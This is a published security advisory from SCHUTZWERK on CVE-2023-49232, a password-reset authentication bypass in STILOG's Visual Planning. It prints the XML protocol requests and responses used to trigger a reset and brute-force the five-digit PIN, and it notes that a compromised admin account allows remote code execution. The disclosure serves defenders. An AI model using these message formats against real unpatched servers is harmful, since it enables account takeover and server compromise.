-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Title =====SCHUTZWERK-SA-2023-004: Authentication Bypass via Password Reset Functionality in Visual Planning
Status ====== PUBLISHED Version ======= 1.0 CVE reference ============= CVE-2023-49232 Link ==== https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-004/ Text-only version: https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-004.txt Affected products/vendor ======================== All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T. Summary =======Unauthenticated attackers can exploit a weakness in the password reset functionality of the Visual Planning[0] application in order to obtain access to arbitrary user accounts including administrators. In case administrative (in the context of Visual Planning) accounts are compromised, attackers can install malicious modules into the application to take over the application server hosting the Visual Planning application.
Risk ====The application does not impose any limits on the number of guesses that can be made. Attackers can therefore initiate the reset for arbitrary users and automate the pin validation process until a valid pin is obtained. The vulnerability allows unauthenticated attackers to gain access to arbitrary user accounts including administrators.
Failed pin validation attempts are not logged by the application which greatly increases the difficulty of detecting ongoing attacks.
With administrative access to Admin Center, attackers can install malicious modules containing Java code that is executed on the application server, resulting in arbitrary command execution.
The entire pin space can be enumerated in approximately one to two hours. Description ===========During a recent red teaming assessment, Visual Planning was identified as part of the customers internet-facing assets. The software is developed by STILOG I.S.T. and provides resource management and scheduling features. A security assessment conducted by SCHUTZWERK found an authentication bypass in Visual Planning's password reset functionality. The application Admin Center (vpadmin) communicates with the server through an XML-based protocol that utilizes proprietary compression methods and is transmitted via HTTP. SCHUTZWERK implemented a custom proxy as part of an assessment in order to intercept and manipulate the messages exchanged between application and server.
One of the first messages sent by the Admin Center application after launch is the following:
<?xml version="1.0" encoding="UTF-8"?> <com.visualplanning.query.NamedMethodParameter> <methodName>canResetPassword</methodName> <rawResult>false</rawResult> <userSession isNull="true"/> <values/> </com.visualplanning.query.NamedMethodParameter>In this request, the client asks the server whether it should display the "Forgot your password ?" button as part of the login form. During the assessment, the server responded as follows:
<?xml version="1.0" encoding="UTF-8"?> <com.visualplanning.query.QueryResult> <resultValues> <HashtableValue> <key>resetPassword</key> <value class="java.lang.Boolean">false</value> </HashtableValue> </resultValues> <status>OK</status> </com.visualplanning.query.QueryResult>By altering the value to "true", the password reset functionality becomes accessible in the application. At this point, attackers can provide the target username. This causes a request similar to the following to be issued:
<?xml version="1.0" encoding="UTF-8"?> <com.visualplanning.query.NamedMethodParameter> <methodName>sendResetPasswwd</methodName> <rawResult>false</rawResult> <userSession isNull="true"/> <values> <HashtableValue> <key>login</key> <value class="String">admin</value> </HashtableValue> </values> </com.visualplanning.query.NamedMethodParameter>While handling this request, the server generates a five digit numeric pin and tries to send it to the email address associated with the provided username. Regardless of whether the email could be successfully transmitted, the generated pin is stored in a attribute of the session used while performing the reset. It should be noted that the password reset request message can be sent directly without enabling the button in the GUI if the message format is already known.
To complete the reset process, the correct pin (matching the pin stored in the session attribute) must be specified. A message similar to the following is issued by the application to validiate the provided pin:
<?xml version="1.0" encoding="UTF-8"?> <com.visualplanning.query.NamedMethodParameter> <methodName>validateResetPasswwd</methodName> <rawResult>false</rawResult> <userSession isNull="true"/> <values> <HashtableValue> <key>login</key> <value class="String">admin</value> </HashtableValue> <HashtableValue> <key>userCode</key> <value class="String">58344</value> </HashtableValue> </values> </com.visualplanning.query.NamedMethodParameter>When an invalid pin is provided, the server responds with the following XML document:
<?xml version="1.0" encoding="UTF-8"?> <com.visualplanning.query.QueryResult> <resultValues> <HashtableValue> <key>ERROR</key> <value class="String">Invalid code.</value> </HashtableValue> </resultValues> <status>KO</status> </com.visualplanning.query.QueryResult>In case the pin is valid, the server responds with a VPUser data structure similar to the following:
<?xml version="1.0" encoding="UTF-8"?> <com.visualplanning.query.QueryResult> <resultValues> <HashtableValue> <key>vpUser</key> <value class="com.visualplanning.data.admin.VPUser"> <ID>1</ID> <UID>C442-53EB-B185-8804-F6BF-70AC-61C3-31BC</UID> <activated>true</activated> <comments>Super administrateur</comments> <email>yahd6Coo () schutzwerk com</email> <expiredPasswd>false</expiredPasswd> <groups/> <imageProfilBase64></imageProfilBase64> <ldapSetting> <entityID>-1</entityID> </ldapSetting> <licenses/> <loginAttemps>0</loginAttemps> <mobilePhoneNumber></mobilePhoneNumber> <name>admin</name> <ownerID>0</ownerID> <phoneNumber></phoneNumber> <platform>VP</platform> <resetPasswd>true</resetPasswd> <resourceUser>false</resourceUser> </value> </HashtableValue> </resultValues> <status>OK</status> </com.visualplanning.query.QueryResult>In addition, an empty password is set for the target username. Upon first login after reset, a new password must be set for this user.
Solution/Mitigation =================== The vendor suggests to update to Visual Planning 8 (Build 240207) Disclosure timeline =================== 2023-11-01: Vulnerability discovered 2023-11-09: Contact vendor in order to determine security contact 2023-11-10: Received generic sales response from vendor 2023-11-14: Contacted CTO of vendor directly 2023-11-16: Vulnerabilities demonstrated in call with contact at vendor 2023-11-24: CVE assigned by Mitre 2023-11-24: Additional technical details provided to vendor2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings is in progress 2024-01-30: Inquired about mitigation status regarding the reported vulnerabilities 2024-01-30: Vendor informed SCHUTZWERK that some of the issues were already fixed
2024-03-08: Sent advisory drafts to vendor 2024-03-28: Received patch information and release of advisory Contact/Credits ===============The vulnerability was discovered during an assessment by Lennert Preuth and David Brown of SCHUTZWERK GmbH.
References ========== [0] https://www.visual-planning.com/en/[1] https://cheatsheetseries.owasp.org/cheatsheets/Forgot_Password_Cheat_Sheet.html
Disclaimer ==========The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The most recent version of this security advisory can be found at SCHUTZWERK GmbH's website ( https://www.schutzwerk.com ).
Additional information ====================== SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/ SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/ -----BEGIN PGP SIGNATURE----- iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0TAaHGFkdmlzb3Jp ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrtU9xAArJL5rKh3sNRto6xC7bgj 660J6OALXG9O9qaJo1RHYsVo9287THvSgsPs8/YXZhFNtkccsdxRll3t3UxC3IOU /h+f612I4lFlk9t0LVH2eu6r8lTw47YLbO9RKoBF0TsysJMnytuM9+BxRyd+nLVo rfVxmRfUhDKf5odkDz8IeatmMMeI1e7JuGylWtVOkSxdbCsmwEbObrEsCwe74AR4 PKJDVb6tq03q1g5H0yq7QLCMyuN7UBc0Jb/sYkL3hu0m7JlqyCVUfNBaD1pqZvlA C3b+DnrJHwAPYKr5I4pKfss5Ghh3+yIaS/UIyaIImgS6pyBDOJUHULiMKumZYHCl r3YWOLAjuTUztRmsktavjgItsf2NsXnBLYMDjZuZtBd6iU7iNKQ4EdbCNt8YCN8w KmU3ot2Kwjty2aLj7CBdg8Mrc4Rr3PH2PoXWxSEBMWqokoO2zWVft+5BpJ/onU2P um41+KNb7h7Pf/QVkU1KOZbwAI9tgJvZn2hHXmbQov0w3s0J9dqNoJ4Eu+qVPMAx +Ug9Qvo3Qh325pDEeqxUhOsPh4dHam97ouDYE3XXLlKk8rar8TjhANAHHO4uUltW gikWB1VVmGy7XS9lflWE1QLqO8BBK1jZUDU21fWQeAeF64R6NXikj0tkfvjOwwt/ CTQ2Nugk2kdYf5d73FSO9ds= =PvYR -----END PGP SIGNATURE----- -- SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany Zertifiziert / Certified ISO 27001, 9001 and TISAX Phone +49 731 977 191 0 advisories () schutzwerk com / www.schutzwerk.com Geschäftsführer / Managing Directors: Jakob Pietzka, Michael Schäfer Amtsgericht Ulm / HRB 727391 Datenschutz / Data Protection www.schutzwerk.com/datenschutz
Attachment:
OpenPGP_signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/